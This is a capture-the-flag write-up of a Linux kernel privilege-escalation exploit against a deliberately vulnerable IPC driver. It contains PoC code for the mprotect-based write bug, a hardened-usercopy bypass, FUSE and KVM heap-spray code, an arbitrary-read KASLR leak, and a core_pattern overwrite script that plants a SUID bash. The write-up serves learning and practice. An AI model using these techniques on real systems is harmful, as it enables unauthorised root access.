BFS Ekoparty 2022 Kernel exploitation challenge write-up

Last month Blue Frost Security published two exploitation challenges for Ekoparty 2022. One of them was a Linux kernel challenge. I don’t have much experience with Linux kernel exploitation, so this was a good opportunity to practise. I also write this up as a reference for my future self.

Let’s start!

Setup

We are given the source code of a Linux Kernel Module. We are told it’s an IPC driver, and we are asked to load it on an Ubuntu 22.04 VM with the latest kernel (5.15.0-52-generic) and get root by exploiting it.

For the virtual machine, I will be using Vagrant with VirtualBox. In order to create a virtual machine, we first need to set up a Vagrantfile. This can be done with vagrant init ubuntu/jammy64 (jammy is the 22.04 box). Then, we can edit it and add the line config.vm.synced_folder ".", "/vagrant" to mount the host’s current directory on /vagrant in the guest. Finally, we can create the VM with vagrant up, connect to it with vagrant ssh, and shut it down with vagrant halt. Once we are connected, we can build the module with make, load it with sudo insmod blunder.ko, and give access permissions to the file with sudo chmod 666 /dev/blunder. This gives us a fast iteration cycle of building the exploit, testing it, and resetting the VM in case it crashes (which in my case happened a lot).

Analysis

The driver

The driver implements an IPC mechanism for sending messages from one process to another. The idea is that each process opens the file /dev/blunder, creates a buffer with mmap, and then one sends a message with the ioctl IOCTL_BLUNDER_SEND_MSG while the other receives it with IOCTL_BLUNDER_RECV_MSG.

The interesting thing is that the mmap handler calls kmalloc and maps the result to the virtual memory area, so it is backed by kernel heap and is accessible from both kernel and userspace. The driver uses that mapping to store the metadata of buffers and the contents of the messages received, so when a message is sent to a process it is directly copied to its mapping. Then, when the process attempts to receive it, the kernel simply returns a pointer to that mapping where the message has already been copied. Having that mapping shared by both kernel and user avoids an extra copy of the message, since it is copied directly from one process to another.

Finally, in addition to data, messages can also include file descriptors which will be copied from one process to another.

Later on I was told this driver was inspired by Binder, an Android driver which implements a similar IPC mechanism.

Structures

The global state of the driver keeps the processes that are using the device in an rb-tree ordered by pid, and a pointer to one of them as a context manager, which doesn’t seem to have any special functionality.

  
struct blunder_device {
	spinlock_t lock;
	struct rb_root procs;
	struct blunder_proc *context_manager;
};

Each process has an associated blunder_proc, which has a blunder_alloc and a list of messages pending to receive.

  
struct blunder_proc {
	struct kref refcount;
	spinlock_t lock;
	int pid;
	int dead;
	struct rb_node rb_node;
	struct blunder_alloc alloc;
	struct list_head messages;
};

The blunder_alloc structure holds a kernel pointer to the mapping (the one returned by kmalloc), its size, the difference between the kernel and user pointers (so user_ptr = mapping - user_buffer_offset), and a list of buffers where messages are saved.

  
struct blunder_alloc {
	spinlock_t lock;
	void *mapping;
	size_t mapping_size;
	ptrdiff_t user_buffer_offset;
	struct list_head buffers;
};

Buffers are described by blunder_buffer. Every buffer is stored in the mapping that is shared by both kernel and user, and the metadata includes whether it’s free or not, its size, and the size of its data in case it’s not free. offsets_size is an unimplemented feature and remains 0. This structure is followed by the actual data.

  
struct blunder_buffer {
	struct list_head buffers_node;
	atomic_t free;
	size_t buffer_size;
	size_t data_size;
	size_t offsets_size;
	unsigned char data[0];
};

Buffers are held in a linked list. First, when the user performs the mapping, the whole area is set up as a single buffer. Then, each time a message is stored in a buffer and the remaining size is large enough, the buffer is split and the remaining space is used to create a new buffer that is added to the linked list.

Finally, messages are described by blunder_message. It has a pointer to the sender (although what is actually stored there is the pid), a pointer to the buffer where the data is stored, and an array of struct file*s that must be installed on the receiving end.
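The split arithmetic can be sketched in userspace as follows. This is only an illustration under stated assumptions: the 0x30 header size is what struct blunder_buffer should occupy on x86-64, split_buffer and struct split_result are hypothetical names, and the driver's "is the remainder large enough" check is left to the caller.

```c
#include <stddef.h>

/* Assumed x86-64 size of the blunder_buffer header:
 * list_head (16) + atomic_t plus padding (8) + three size_t (24). */
#define BLUNDER_HDR_SIZE 0x30

struct split_result {
    size_t new_hdr_offset; /* where the new buffer's header lands in the mapping */
    size_t new_buf_size;   /* data capacity of the new, free buffer */
};

/* Model of splitting a free buffer whose header sits at hdr_offset and whose
 * data area holds buffer_size bytes, after storing msg_size bytes in it.
 * The caller is assumed to have checked that the remainder is big enough. */
static struct split_result split_buffer(size_t hdr_offset, size_t buffer_size,
                                        size_t msg_size)
{
    struct split_result r;
    size_t remaining = buffer_size - msg_size;

    /* The new header starts right after the message data. */
    r.new_hdr_offset = hdr_offset + BLUNDER_HDR_SIZE + msg_size;
    /* The new buffer gets the remainder minus its own header. */
    r.new_buf_size = remaining - BLUNDER_HDR_SIZE;
    return r;
}
```

Assuming a one-page mapping starts as a single buffer of 0x1000 - 0x30 bytes, storing a 0x10-byte message puts the second header at offset 0x40 and leaves it 0xf90 bytes, which agrees with the 0xf90 value visible in the PoC dump later in this post.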

  
struct blunder_message {
	struct list_head entry;
	int opcode;
	struct blunder_proc *from;
	struct blunder_buffer *buffer;
	size_t num_files;
	struct file **files;
};

On the user side, the user must hand the following data to send a message, with the offsets stuff being unimplemented.

  
struct blunder_user_message {
	int handle;
	int opcode;
	void *data;
	size_t data_size;
	size_t *offsets;
	size_t offsets_size;
	int *fds;
	size_t num_fds;
};

Vulnerabilities

As you may have noticed from the analysis above, there is one serious issue with the design. The mapping, which is shared by user and kernel, contains blunder_buffers that have kernel pointers and other metadata. This amounts to an infoleak. Unfortunately, the driver doesn’t allow us to map it as writable:

  
/* Bail out if mapping is too large or writable */
if (sz > BLUNDER_MAX_MAP_SIZE || vma->vm_flags & VM_WRITE) {
    goto out;
}

However, the mmap handler doesn’t remove the VM_MAYWRITE flag from vma->vm_flags, which is set by default if you open the device file with write permissions. This means we can map as read-only, and then change it to writable with mprotect, allowing us to modify the blunder_buffers.
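To make the VM_WRITE versus VM_MAYWRITE distinction concrete, here is a small userspace model. It is a simplification, not kernel code: the flag values mirror include/linux/mm.h, while driver_mmap_accepts and mprotect_allowed are hypothetical helpers that only imitate the driver's check and the rule that mprotect may grant an access bit only if the matching VM_MAY* bit is set.

```c
#include <stdbool.h>

/* Flag values as defined in include/linux/mm.h. */
#define VM_READ     0x01UL
#define VM_WRITE    0x02UL
#define VM_EXEC     0x04UL
#define VM_MAYREAD  0x10UL
#define VM_MAYWRITE 0x20UL
#define VM_MAYEXEC  0x40UL

/* Model of the driver's mmap check: only a currently writable VMA is rejected. */
static bool driver_mmap_accepts(unsigned long vm_flags)
{
    return !(vm_flags & VM_WRITE);
}

/* Model of the mprotect permission rule: every requested access bit needs
 * the corresponding VM_MAY* bit, which sits four bits higher. */
static bool mprotect_allowed(unsigned long vm_flags, unsigned long new_access)
{
    unsigned long may = (vm_flags >> 4) & (VM_READ | VM_WRITE | VM_EXEC);
    return (new_access & ~may) == 0;
}
```

With flags VM_READ | VM_MAYREAD | VM_MAYWRITE the mapping passes the driver's check and can later be upgraded to writable. Clearing VM_MAYWRITE in the mmap handler would make the same mprotect request fail.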

In fact, BFS published a hint that pointed to these vulnerabilities. It looks like Binder had the same design issue of storing the metadata in the shared mapping, although they were clever enough to clear the VM_MAYWRITE flag.

So what have we got? Recall we have full control of blunder_buffer structs, because they are mapped in userspace. Regarding leaks, blunder_buffers are linked together with the usual list_head. If we have two of them, the next pointer of the first one will point to the second one, leaking the kernel address of the mapping. Assuming we are mapping one page, this belongs to kmalloc-4k. In addition, the prev pointer will point to the head of the list, which is stored in blunder_proc. Since its size is 104 bytes, it will be in kmalloc-128.
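As a worked example of decoding these leaks, the sketch below turns the two list pointers of the first buffer into object addresses. The offsets are assumptions derived from the struct definitions above on x86-64 (0x30 for the buffer header, 0x48 for alloc.buffers inside blunder_proc), and the helper names are hypothetical.

```c
#include <stdint.h>

/* Assumed x86-64 offsets, derived from the struct definitions above. */
#define BUF_HDR_SIZE        0x30 /* sizeof(struct blunder_buffer) */
#define PROC_BUFFERS_OFFSET 0x48 /* offsetof(struct blunder_proc, alloc.buffers) */

/* The first buffer's next pointer targets the second header, which sits
 * right after the first header and the first message's data. */
static uint64_t mapping_from_next(uint64_t first_next, uint64_t first_msg_size)
{
    return first_next - BUF_HDR_SIZE - first_msg_size;
}

/* The first buffer's prev pointer targets the list head embedded in
 * blunder_proc, so subtracting its offset yields the object's start. */
static uint64_t proc_from_prev(uint64_t first_prev)
{
    return first_prev - PROC_BUFFERS_OFFSET;
}
```

Fed with the pointers from the PoC output further down (next = ffff9272c50fb040, prev = ffff9272c3a5fd48, message size 0x10), this gives a mapping at ffff9272c50fb000 and a blunder_proc at ffff9272c3a5fd00. The latter is 128-byte aligned, as expected for a kmalloc-128 object.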

On the other hand, modifying the buffer metadata may give us some juicy primitives. For example, modifying its size may allow us to send a message bigger than the available size, resulting in a heap overflow with controlled data.

Let’s write a simple POC. Code snippets won’t include error handling for brevity. First, let’s check if the leak works:

  
int g_fd;
void* g_p;

void dump(const void* p, size_t size) {
	const uint64_t* p_u64 = (const uint64_t*)p;
	for (size_t i = 0; i < size/8; i++) {
		printf("%016lx ", p_u64[i]);
	}
	printf("\n");
}

int send_blunder_message(void* data, size_t data_size, int* fds, size_t num_fds) {
	// Send a message to ourselves
	struct blunder_user_message umsg = {
		.handle = getpid(),
		.data = data,
		.data_size = data_size,
		.fds = fds,
		.num_fds = num_fds,
	};
	return ioctl(g_fd, IOCTL_BLUNDER_SEND_MSG, &umsg);
}

int main() {
	g_fd = open("/dev/blunder", O_RDWR);
	g_p = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, g_fd, 0);

	char data[0x10];
	send_blunder_message(data, sizeof(data), NULL, 0);
	dump(g_p, 0x60);
}

  
vagrant@ubuntu-jammy:/vagrant$ ./poc
ffff9272c50fb040 ffff9272c3a5fd48 0000000000000000 0000000000000010 0000000000000010 0000000000000000
0000000000000000 0000000000000000 ffff9272c3a5fd48 ffff9272c50fb000 0000000000000001 0000000000000f90

When we send a message, the first blunder_buffer is split. Here we are leaking the linked list pointers of both buffers. The first pointer points to the second buffer, the last one points to the first one, and the two others point to the list head in blunder_proc. Now, let’s try to modify the buffer and do an overflow. For example, we could set the first buffer at the beginning of the mapping as free, and change its size to 0x2000.

  
[...]

mprotect(g_p, 0x1000, PROT_READ|PROT_WRITE);
struct blunder_buffer* buf = g_p;
buf->free = 1;
buf->buffer_size = 0x2000;

char* too_big_data = malloc(0x2000);
send_blunder_message(too_big_data, 0x2000, NULL, 0);

  
vagrant@ubuntu-jammy:/vagrant$ ./test
[...]
Segmentation fault

Hmm? Did I fail at coding C once more? Let’s take a look at dmesg:

  
vagrant@ubuntu-jammy:/vagrant$ sudo dmesg
[...]
[ 135.345109] usercopy: Kernel memory overwrite attempt detected to SLUB object
'kmalloc-4k' (offset 48, size 8192)!
[ 135.349562] ------------[ cut here ]------------
[ 135.351382] kernel BUG at mm/usercopy.c:99!
[ 135.353388] invalid opcode: 0000 [#2] SMP PTI
[ 135.355096] CPU: 0 PID: 1366 Comm: test Tainted: G      D    OE     5.15.0-53
[ 135.357718] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBo
[ 135.360335] RIP: 0010:usercopy_abort+0x7b/0x7d
[...]
[ 135.383391] Call Trace:
[ 135.384114]  <TASK>
[ 135.384785]  __check_heap_object+0x174/0x1b0
[ 135.385673]  __check_object_size.part.0+0x134/0x150
[ 135.386618]  __check_object_size+0x1d/0x30
[ 135.387477]  blunder_ioctl+0x238/0x3e0 [blunder]

It looks like modern kernels have a mitigation called hardened usercopy, which checks that “what is being copied fits within the size of the object allocated” when calling copy_to_user and copy_from_user. Since we are attempting to write 8192 bytes to a kmalloc-4k object, the check fails. This effectively kills heap overflow from one object to another. Isn’t there anything we can do?

Turns out, there is. We can bypass this mitigation if we write directly to the object next to ours, meaning the dest argument of copy_from_user must point to the target object. We can get this by creating a fake blunder_buffer exactly at the end of our mapping, so its data starts at the beginning of the next object. Then, we can link it to our list of buffers by modifying the first blunder_buffer in the mapping. In order to do so, we’ll need to get its kernel address from the leak. Let’s try it!

  
[...]
// Get mapping address
struct blunder_buffer* buf = g_p;
uint64_t mapping_addr = (uint64_t)buf->buffers_node.next - 0x40;

// Create fake buffer
struct blunder_buffer* fake_buf = g_p + 0x1000 - sizeof(struct blunder_buffer);
fake_buf->free = 1;
fake_buf->buffer_size = 0x1000;

// Link it after our first buffer
buf->buffers_node.next = mapping_addr + 0x1000 - sizeof(struct blunder_buffer);

char* too_big_data = malloc(0x1000);
send_blunder_message_nocheck(too_big_data, 0x1000, NULL, 0);

Running this crashes the vm, which means we are successfully overflowing into some object and bypassing the mitigation!
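To see why the second attempt passes the check while the first one did not, here is a simplified userspace model of the per-object bounds check. It is an assumption-laden sketch: usercopy_ok is a hypothetical helper, it ignores the other checks hardened usercopy performs, and it assumes the destination lies inside some slab of the given object size.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Returns true if the copy [ptr, ptr + n) stays inside a single slab object.
 * slab_base is the address of the first object in the slab and object_size
 * the size of each object (0x1000 for kmalloc-4k). */
static bool usercopy_ok(uint64_t slab_base, size_t object_size,
                        uint64_t ptr, size_t n)
{
    /* Offset of ptr inside the object that contains it. */
    size_t offset = (size_t)((ptr - slab_base) % object_size);
    return n <= object_size - offset;
}
```

In the first PoC the destination was the data of the first buffer (offset 48 into our object) with a size of 8192, so the copy crossed the object boundary and was rejected, matching the dmesg line. With the fake buffer, the destination is offset 0 of the neighbouring object and the size is 0x1000, so the copy fits entirely inside that object and the check has nothing to complain about.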

Exploitation

First primitives

Before looking for some target object to overwrite, let’s consider the powerful spray primitive we have. When we open the device, a blunder_proc is allocated in kmalloc-128. Then, when we mmap a page for the device, it is allocated in kmalloc-4k. Because of the leaks discussed earlier, we are able to obtain the address of both objects. This leads to the following strategy:

1. Allocate a bunch of mappings in kmalloc-4k.
2. Get their kernel addresses and look for two of them that are adjacent.
3. Free the second one and reallocate it with a target object.
4. Trigger the overflow on the first one to overwrite the target object.

Since each process can only open and map the device once, this will require forking and some IPC mechanism.
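The "look for two adjacent objects" step can be sketched as a plain search over the leaked addresses. This is a minimal illustration with a hypothetical helper name (find_adjacent), not the code from my exploit. The same search works for both kmalloc-4k mappings (obj_size 0x1000) and kmalloc-128 objects (obj_size 128).

```c
#include <stddef.h>
#include <stdint.h>

/* Search the leaked kernel addresses for a pair where addrs[*hi] directly
 * follows addrs[*lo] in memory. Returns 1 and fills both indexes on success,
 * 0 if no such pair exists. */
static int find_adjacent(const uint64_t *addrs, size_t n, uint64_t obj_size,
                         size_t *lo, size_t *hi)
{
    for (size_t i = 0; i < n; i++) {
        for (size_t j = 0; j < n; j++) {
            if (addrs[j] == addrs[i] + obj_size) {
                *lo = i;
                *hi = j;
                return 1;
            }
        }
    }
    return 0;
}
```

The quadratic loop is fine here because the spray only involves a modest number of objects. The process owning index lo then performs the overflow, while the one owning index hi is released to make room for the target object.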

Now, when looking for target objects I usually refer to this post by ptr-yudai. Our heap overflow is in kmalloc-4k, and the only object listed there that would fit that size is msg_msg. I had been reading some posts about kernel exploitation abusing that object (link, link), so I was excited to try that technique. However, I wasn’t able to trigger the reallocation correctly. Then I realised that msg_msg is allocated with the flag GFP_KERNEL_ACCOUNT (here), so it is stored in kmalloc-cg-4k instead of kmalloc-4k. I knew cross-cache overflows were a thing (link), but I didn’t feel confident enough to try that out.

Then, I started to think about overwriting the blunder_proc. It belongs to kmalloc-128, but we know its address. Therefore, similarly to the previous strategy, we could:

1. Allocate two adjacent blunder_procs.
2. Free the first one, do some heap spray and reallocate it with a fake blunder_buffer whose data will start at the beginning of the second blunder_proc.
3. Link that buffer to our linked list.
4. Send a message that will be stored in the fake blunder_buffer and will overwrite the second blunder_proc.

Note that we could also have freed the second blunder_proc and replaced it with some other target object. However, the only target object for kmalloc-128 that the post mentions is subprocess_info, which now belongs to kmalloc-96. So let’s stick to blunder_proc for now.

What primitives do we get when overwriting blunder_proc? If we remember, it has a blunder_alloc embedded in it, which has a kernel pointer to the mapping. When the blunder_proc is freed, that mapping is also freed. Hence, if we overwrite that pointer, we can get an arbitrary free primitive. However, at the time I didn’t think of any suitable target object, and didn’t follow that path. More on this path here.

I was looking for some read primitive that would allow me to leak the kernel base. I found it with the blunder_message struct. blunder_proc has a list of messages that have been sent to the process and copied to its mapping, and that are pending to be received with IOCTL_BLUNDER_RECV_MSG. The idea is to link a fake blunder_message to that list. We can create the fake message in the shared mapping, and as we know its address, we’ll be able to link it when overwriting the blunder_proc. Then, when receiving that message, the driver will do:

  
    umsg.data_size = msg->buffer->data_size;

This dereferences the buffer pointer of the fake message and returns the data_size value it finds there. Therefore, by creating a fake message with an appropriate buffer pointer we get an arbitrary read primitive. The message is removed from the list when received. In order to repeat the primitive, we have to use IOCTL_BLUNDER_FREE_BUF with the fake blunder_buffer to mark it as free, and repeat the overflow to link the message again. Note that there is no more heap spray required: once we successfully reallocate with the fake blunder_buffer, we are done.
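Choosing the buffer pointer for a given target address is just an offsetof computation. The sketch below uses a userspace mirror of blunder_buffer with explicit padding to match the assumed x86-64 layout. The struct and the helper fake_buffer_ptr_for are illustrative names, and the remaining fields of the fake message are left out because they depend on the driver's receive path.

```c
#include <stddef.h>
#include <stdint.h>

/* Userspace mirror of struct blunder_buffer (assumed x86-64 layout,
 * with the padding after atomic_t made explicit). */
struct blunder_buffer_u {
    uint64_t next;         /* buffers_node.next */
    uint64_t prev;         /* buffers_node.prev */
    uint32_t free;         /* atomic_t */
    uint32_t pad;
    uint64_t buffer_size;
    uint64_t data_size;
    uint64_t offsets_size;
};

/* Value to store in the fake message's buffer field so that
 * msg->buffer->data_size aliases the 8 bytes located at target. */
static uint64_t fake_buffer_ptr_for(uint64_t target)
{
    return target - offsetof(struct blunder_buffer_u, data_size);
}
```

Under this layout data_size sits 32 bytes into the header, so reading address X means pointing the fake message's buffer at X - 32 and taking the data_size field that the receive ioctl hands back.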

One issue I faced when trying to implement this is the following. We need to spawn multiple processes in order to allocate several blunder_procs, which are held in an rb-tree. When overwriting the target blunder_proc, I was corrupting its rb_node field. Then, when any of the other processes finished and the device was closed, the driver tried to erase the corresponding blunder_proc from the rb-tree, crashing the VM. To solve this, I had to dig a bit into rb-trees. It turns out each rb_node has a pointer to its left and right child, and a field __rb_parent_color, which holds both a pointer to the parent and the color of the node (the least significant bit is used for the color, and the rest for the pointer). The solution was to wait for every other process to finish, so our blunder_proc becomes the root of the rb-tree. Then, the state of its rb_node is simple and we can correctly set it when overwriting it: every pointer is NULL, and its color is black (according to this).
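The packing of __rb_parent_color can be illustrated with a userspace mirror of struct rb_node. The field order and the color constants follow the kernel headers (RB_RED is 0, RB_BLACK is 1). The struct and helper names are made up for this sketch.

```c
#include <stdint.h>

#define RB_RED   0
#define RB_BLACK 1

/* Userspace mirror of struct rb_node: the kernel declares the fields in
 * this order (__rb_parent_color, rb_right, rb_left). */
struct rb_node_u {
    uint64_t rb_parent_color;
    uint64_t rb_right;
    uint64_t rb_left;
};

/* Pack a parent pointer and a color into one word (color in the low bit). */
static uint64_t rb_pack(uint64_t parent, unsigned color)
{
    return parent | color;
}

/* Recover the parent pointer by masking off the low bits. */
static uint64_t rb_parent_of(uint64_t pc)
{
    return pc & ~3ULL;
}

/* Recover the color from the low bit. */
static unsigned rb_color_of(uint64_t pc)
{
    return (unsigned)(pc & 1);
}

/* State of a node that is the only element of the tree: a black root
 * with no parent and no children. */
static struct rb_node_u lone_root(void)
{
    struct rb_node_u n = { rb_pack(0, RB_BLACK), 0, 0 };
    return n;
}
```

So the 24 bytes to write over the rb_node field of the last remaining blunder_proc are simply the value 1 followed by two NULL pointers.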

Heap spray

Regarding the heap spray, I didn’t know what to use in order to reallocate the first blunder_proc with a fake blunder_buffer. I wanted some object with controlled user data and lifetime which would fit in kmalloc-128. I had read about using setxattr with FUSE as a replacement for userfaultfd, but I wanted to do some research. Looking at references to memdup_user I found this, which is triggered with the KVM ioctl KVM_X86_SET_MSR_FILTER and allows spraying objects with controlled data and lifetime of size up to 1536 bytes. It can be used as follows:

  
#define N_VMS 100
#define SPRAY_SIZE 128

void display_slab_info(const char* msg) {
	printf("[%s]\n", msg);
	system("bash -c \"sudo cat /proc/slabinfo | grep '^kmalloc-128'\"");
}

int main() {
	// Setup VMs
	int vm_fds[N_VMS];
	int kvm_fd = open("/dev/kvm", O_RDWR);
	for (size_t i = 0; i < N_VMS; i++) {
		vm_fds[i] = ioctl_chk(kvm_fd, KVM_CREATE_VM, 0);
	}

	// Setup spray
	void* spray = malloc(SPRAY_SIZE);
	struct kvm_msr_filter filter = {
		.flags = KVM_MSR_FILTER_DEFAULT_DENY,
	};
	for (size_t i = 0; i < KVM_MSR_FILTER_MAX_RANGES; i++) {
		filter.ranges[i] = (struct kvm_msr_filter_range) {
			.flags = KVM_MSR_FILTER_READ,
			.nmsrs = SPRAY_SIZE*8,
			.base = 0,
			.bitmap = spray,
		};
	}

	// Trigger spray
	display_slab_info("before spray");
	for (size_t i = 0; i < N_VMS; i++)
		ioctl_chk(vm_fds[i], KVM_X86_SET_MSR_FILTER, &filter);
	display_slab_info("after spray");
	for (size_t i = 0; i < N_VMS; i++)
		close(vm_fds[i]);
	display_slab_info("after releasing");
}

  
vagrant@ubuntu-jammy:/vagrant$ ./test
[before spray]
kmalloc-128         1440   1856    128   32    1 : tunables    0    0    0 : slabdata     58     58      0
[after spray]
kmalloc-128         2976   2976    128   32    1 : tunables    0    0    0 : slabdata     93     93      0
[after releasing]
kmalloc-128         1570   2048    128   32    1 : tunables    0    0    0 : slabdata     64     64      0

It has several problems though: it is only available for x86, it requires the user to belong to the kvm group, and in case of being inside a vm, it requires nested virtualisation to be enabled. As the last two conditions are not satisfied by the default ubuntu vm, I gave up on this and tried the setxattr + FUSE heap spray.

The idea is to call setxattr(path, name, value, size, 0), where value is a pointer to our spray and size its size. The kernel will call kmalloc(size) and copy our spray to the result here. The problem is that it’s freed at the end of the syscall (here), so we want to block in order to delay this. Previously, userfaultfd could be used. It allowed you to handle page faults in userspace, so if we divided our spray payload in two pages and registered userfaultfd for the second, we could make copy_from_user block when trying to read from the second page, while the first part of the payload has already been copied (link). However, userfaultfd is no longer available to unprivileged users by default.

The solution is to use FUSE as a substitute. FUSE (Filesystem in USErspace) allows you to define handlers for some filesystem syscalls such as open, read, write, etc, in userspace. You can read more about it here. Most resources I’ve found (link, link, link) use this in a very similar way to userfaultfd. The idea is again to split our payload in two pages: an anonymous mapping, and a file mapping backed by our filesystem. Then, we can block in the read() handler of our filesystem when copy_from_user reaches the second page.

However, with FUSE you can also define a setxattr handler. So instead of blocking on the read operation in copy_from_user(), I thought it was easier to block directly in the setxattr handler, called from here. I think that’s a bit simpler to implement, because you don’t have to worry about having your payload divided in two pages. In this case, path (the file we call setxattr on) must belong to the filesystem. You can read the full implementation here. I have written it in a separate file so it’s easier for me (and maybe others) to reuse.

KASLR leak

Even when I got an arbitrary read primitive, I still struggled to get the kernel base. I didn’t know any useful object I could leak from kmalloc-128 and kmalloc-4k. Fortunately, blunder_message has an array of struct file*s, which has a pointer to a struct file_operations, which has function pointers that we can leak to get the kernel base.

The idea is to fork and let the child send a message to itself and tell the main process its blunder_proc address, so the parent can perform the leaks. We can’t do this in the parent, because every time we use the arbitrary read primitive we overwrite its blunder_proc and the message with a struct file* would be lost. In the end, with chained reads we are leaking:

  
child_blunder_proc->messages.next->files[0]->f_op->llseek

Which, when the struct file corresponds to stdin, points to the function no_llseek.
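The chain can be sketched as a sequence of 8-byte reads through any read primitive. Everything numeric here is an assumption: the offsets are what I would expect for the structs above and for struct file and struct file_operations on a 5.15 x86-64 kernel, and they should be checked against the actual build. The toy memory at the bottom holds made-up addresses purely so the chain can be exercised without a kernel. In the exploit the callback would be the arb_read helper.

```c
#include <stddef.h>
#include <stdint.h>

typedef uint64_t (*read64_fn)(uint64_t addr);

/* Assumed offsets (x86-64, kernel 5.15); verify them for your target. */
#define OFF_PROC_MESSAGES 88 /* offsetof(struct blunder_proc, messages) */
#define OFF_MSG_FILES     48 /* offsetof(struct blunder_message, files) */
#define OFF_FILE_F_OP     40 /* offsetof(struct file, f_op) */
#define OFF_FOPS_LLSEEK    8 /* offsetof(struct file_operations, llseek) */

/* Follow child_proc->messages.next->files[0]->f_op->llseek. */
static uint64_t leak_llseek(read64_fn rd, uint64_t child_proc)
{
    /* entry is the first member of blunder_message, so messages.next
     * is also the address of the message itself. */
    uint64_t msg   = rd(child_proc + OFF_PROC_MESSAGES);
    uint64_t files = rd(msg + OFF_MSG_FILES);
    uint64_t file0 = rd(files);
    uint64_t f_op  = rd(file0 + OFF_FILE_F_OP);
    return rd(f_op + OFF_FOPS_LLSEEK);
}

/* Kernel base = leaked symbol address minus that symbol's offset. */
static uint64_t kernel_base(uint64_t leaked_sym, uint64_t sym_offset)
{
    return leaked_sym - sym_offset;
}

/* Toy memory for demonstration only: made-up addresses, not real leaks. */
struct toy_cell { uint64_t addr, value; };
static const struct toy_cell toy_mem[] = {
    { 0x1000 + OFF_PROC_MESSAGES, 0x2000 }, /* proc->messages.next */
    { 0x2000 + OFF_MSG_FILES,     0x3000 }, /* msg->files */
    { 0x3000,                     0x4000 }, /* files[0] */
    { 0x4000 + OFF_FILE_F_OP,     0x5000 }, /* file->f_op */
    { 0x5000 + OFF_FOPS_LLSEEK,   0x6000 }, /* f_op->llseek */
};

static uint64_t toy_read64(uint64_t addr)
{
    for (size_t i = 0; i < sizeof(toy_mem) / sizeof(toy_mem[0]); i++)
        if (toy_mem[i].addr == addr)
            return toy_mem[i].value;
    return 0;
}
```

Subtracting the offset of no_llseek for the running kernel from the leaked pointer then gives the kernel base.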

Privilege escalation

Now that we have broken KASLR, how do we escalate privileges? Our write primitive is rather weak: we can link a fake blunder_buffer to write somewhere, but it must be valid, that is, have a size lower than BLUNDER_MAX_MAP_SIZE = 0x20000, greater than the amount of data we want to write, and have the field free set to 1. We need the first constraint because we need to specify the buffer size as our message size. Setting it to a lower value would result in the fake buffer being split, and crashing when dealing with the linked lists. Since we want to avoid overwriting more than needed due to an overly large size, we can place the data at the end of a mapped page followed by an unmapped page. That way, the copy_from_user in blunder_send_message will fail after copying it to the fake blunder_buffer.

So I wrote some code that would check whether an address was suitable to use as a fake blunder_buffer, and started playing with some interesting objects I could overwrite:

  
uint64_t payload_addr = X;
uint64_t target_buf_addr = payload_addr - sizeof(struct blunder_buffer);
uint64_t free_addr = target_buf_addr + offsetof(struct blunder_buffer, free);
uint64_t buffer_size_addr = target_buf_addr + offsetof(struct blunder_buffer, buffer_size);
uint64_t is_free = arb_read(free_addr) & 0xFFFFFFFF;
uint64_t buffer_size = arb_read(buffer_size_addr);
if (buffer_size < 16 || buffer_size > BLUNDER_MAX_MAP_SIZE)
    die("error: buffer_size = %#lx, needed >= 0x10 and <= %#x :(\n", buffer_size, BLUNDER_MAX_MAP_SIZE);
if (is_free == 0)
    die("error: free = 0, needed nonzero :(\n");
printf("blunder_buffer suitable: free=%lx, buffer_size=%lx\n", is_free, buffer_size);

Creds

With a KASLR leak and an arbitrary read primitive, I could calculate the address of init_task, traverse the linked list of tasks until finding mine, and read its cred pointer. I managed to find a suitable place to use as fake buffer, where the buffer size corresponded to the uid of a previous struct cred. That’s when hardened usercopy hit me in the face again:

[ 5885.570967] usercopy: Kernel memory overwrite attempt detected to SLUB object 'cred_jar' (offset 56, size 1000)!
[ 5885.573638] ------------[ cut here ]------------
[ 5885.573641] kernel BUG at mm/usercopy.c:99!
[...]

The copy_from_user was pointing to the previous struct cred in memory, so it was caught by the mitigation. So close yet so far.

modprobe_path

I was surprised when I saw that CONFIG_STATIC_USERMODEHELPER is not set by default on Ubuntu. The idea was to modify modprobe_path. So I checked whether some data nearby could be used as a fake blunder_buffer, but that wasn’t the case. I found a suitable place, but it was a bit far away from our target modprobe_path. In theory this isn’t a problem: because we have an arbitrary read primitive, we can just read everything we’re going to overwrite so we don’t actually modify anything except our target. But the VM was crashing anyway. The reason was probably that when sending a message, apart from storing the data in the buffer, the driver does buf->free = 0 and buf->data_size = umsg.data_size. In our case, this probably overwrote some pointers that were in use, which led to a crash. Unlucky!

core_pattern

I was about to consider other options, like the arbitrary free primitive we saw, or cross-cache attacks, when I remembered there was also core_pattern. While the modprobe_path binary is executed when we attempt to execute a file with unknown format, core_pattern is used to execute a binary when a process crashes, with the intention of producing a core file. This time, I found a suitable address to use as a fake blunder_buffer very close, and it didn’t seem to overwrite anything important. So we can overwrite core_pattern with |/tmp/x, which is a script that will copy bash, make root its owner, and activate the SUID bit. Then, we only have to crash a process for the script to be executed and get a root shell:

  
system("echo '"
           "#!/bin/bash\n"
           "cp /usr/bin/bash /tmp/bash\n"
           "chown root:root /tmp/bash\n"
           "chmod 4755 /tmp/bash"
       "' > /tmp/x");
system("chmod +x /tmp/x");
if (!fork()) {
	*(uint64_t*)0 = 0;
}
wait(NULL);
system("/tmp/bash -p");

Note that in my exploit I had forked previously and I was running on a child process, so running /tmp/bash had to be done from the parent process to keep stdin working.

Full exploit

You can read the full exploit here.

Another exploit strategy

Instead of going down the way of the arbitrary read primitive, we could have used the arbitrary free. I was told this was the path the author followed.

Given the ability to overwrite a blunder_proc as we did here, we can overwrite the mapping pointer, which points to the memory region returned by kmalloc and mapped to the user, with a maximum size of 0x20000. The idea is to make it point to the mapping of another target process. Then, when closing the process with the overwritten blunder_proc, the mapping of the target process will be freed instead. But that target process will still have a stale pointer to its mapping in its blunder_proc, leading to UAF. Not only that, but that mapping is still mapped in userspace. So we have up to 0x20000 bytes of kernel heap mapped in userspace.

One of the ways of exploiting this could be opening /etc/passwd many times to spray struct file objects. Then, we could iterate our mapping, which belongs to kernel heap, looking for one of the files, and add FMODE_WRITE and FMODE_CAN_WRITE to its file->f_mode to get write permissions. This is probably the easiest way to get a root shell, but we could spray other known objects to gain other primitives.

